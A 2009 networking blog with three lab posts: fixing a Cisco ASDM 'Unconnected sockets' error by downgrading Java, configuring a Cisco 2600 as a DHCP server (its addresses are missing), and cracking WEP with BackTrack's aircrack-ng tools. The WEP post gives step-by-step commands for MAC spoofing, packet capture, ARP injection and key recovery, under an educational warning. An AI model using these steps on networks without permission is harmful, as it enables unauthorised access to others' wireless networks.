Saturday, January 17, 2009

Cisco ASDM: Unconnected sockets not implemented

Yesterday, I was trying to use GNS3 to simulate PIX firewall and configure VPN connect in a vmware virtual machine (Windows XP). The version I was using is pix802.bin and asdm-603.bin. After everything is settled, I started the ASDM, and I got this error:

“ASDM is unable to continue loading, Click OK to exit from ASDM.

Unconnected sockets not implemented”

It is weird, because I did the same settings before (in the same virtual machine), and it was no problem at all, what cause this problem? The only thing I did to this virtual machine was I just upgrade the Java version to “Java™ 6 Update 11”, I begun to doubt the incompatible of new Java and ASDM, so I just uninstalled “Java 6 Update 11”, and installed the old “Java 6 Update 7” (the version I used before), and it works. I finally got the ASDM management interface.


Here’s what I’ve done:

1.       Go to and download “Java SE 6 Update 7”

2.       Uninstall “Java 6 Update 11”.

3.       Install jre-6u7-windows-i586-p.exe

4.       Open “Control panel”-> “Java”, tab “Update”, uncheck “check for updates automatically”

5.       Now you should be able to run ASDM

Thursday, January 8, 2009

Configure Cisco 2600 Router as a DHCP Server

Lab Section:  Router and Routing Protocol

Lab Title: Configure Cisco 2600 Router as a DHCP Server



1.       Understand how to configure Cisco 2600 as a DHCP server.

2.       Understand how the DHCP server distribute IP



1.       DHCP, ARP, DNS.





1.       Don’t distribute IP address and from to

2.       Default gateway is

3.       Dns server is

4.       The ranger of IP that can be distributed is



1. Open a terminal to setup the router:


Router#conf t

Router(config)#ip dhcp excluded-address

Router(config)#ip dhcp excluded-address

Router(config)#ip dhcp pool testdhcp


  default-router  Default routers

  dns-server      Set name server

  exit            Exit from DHCP pool configuration mode

  network         Network number and mask

  no              Negate a command or set its defaults






Router#conf t

Router(config)#interface fastEthernet 0/0

Router(config-if)#ip address

Router(config-if)#no shut



2.       Check the PC’s IP address. Open a command line window,

> ipconfig /renew

              --- Renew the IP address.

> ipconfig /all

              --- Show current IP setting.



3.       Back to the terminal of router:

Router#show arp          

---Display Arp table

Router#show ip dhcp binding

       --- Display all the distributed IP


1.      For more information, please visit my blog

2.       Video demo is located in

Saturday, January 3, 2009

Lab4 Crack WEP using Blacktrack3.0 live CD

Lab Section:  Wireless Security

Lab Title: Crack WEP using Blacktrack3.0 live CD



1.       Understand how WEP works.

2.       Understand the method of cracking WEP

3.       Warning: It is illegal to crack other peoples’ wireless connection without their permission. this tutorial is for educational purposes only



1.       Check if your wireless card is supported by Blacktrack:

2.       Detect, sniff, inject wireless network

3.       Always can use “man [command]” to get the description of the command.



1.       airmon-ng: change the wireless card into monitor mode.

2.       ifconfig: configure a card

3.       iwconfig: configure a wireless card

4.       macchanger: change the mac address of a networking card

5.       airodump-ng: capture packets

6.       aireplay-ng: generate traffic by injecting ARP-request packets into a wireless network.

7.       commview for wifi: (optional) generate traffic.




1. Get the target AP’s information (BSSID, ESSID, channel etc.)

Open a terminal window.

# cd /tmp

# iwconfig                          

-- Show and get the wireless device name.

# airodump-ng [device]        

-- Once you get the information, press crtl+c to stop the capture, then copy and paste the target AP’s information to a notepad.


2. Change the wireless card’s MAC address

# macchanger –s rausb0

       -- Show the wireless card’s MAC address

# airmon-ng stop [device]

       -- turn wireless card into manage mode.

# ifconfig [device] down

       -- Turn off the wireless card; otherwise you can not change the MAC address.


# macchanger –a rausb0

-- Change the MAC of the wireless card to a faked MAC. An attacker always wants to hide himself. This is a necessary step for attack purpose.

# ifconfig [device] up

       -- Turn on the wireless card.


3. Change the wireless card into monitor mode

# airmon-ng start [device]

       -- Enable the monitor mode

# iwconfig

       -- Make sure the wireless card is in the Monitor mode.


4. Capture packets:

# airodump-ng –c [channel] –w [file name] –-bssid [AP’s bssid] --ivs [device]

-- To understand the parameter’s meaning, type “airodump --help” or “man airodump”. Leave this window opened


5. Associate the wireless card with the target AP:

Open a new terminal window

# aireplay-ng -1 0 -e [essid] -a [bssid] -h [wireless card’s MAC] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”.


6. Generate traffics:

# aireplay-ng -3 –b [bssid] –h [wireless card’s MAC address] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”. Leave this window opened. Additionally, you can use commview for wifi to generate traffics to increase the crack process.


7. Crack the password:

Open a new terminal window

# cd /tmp

# aircrack-ng –b [bssid] *.ivs



1.       For more information, please visit my blog

2.       Video demo is located in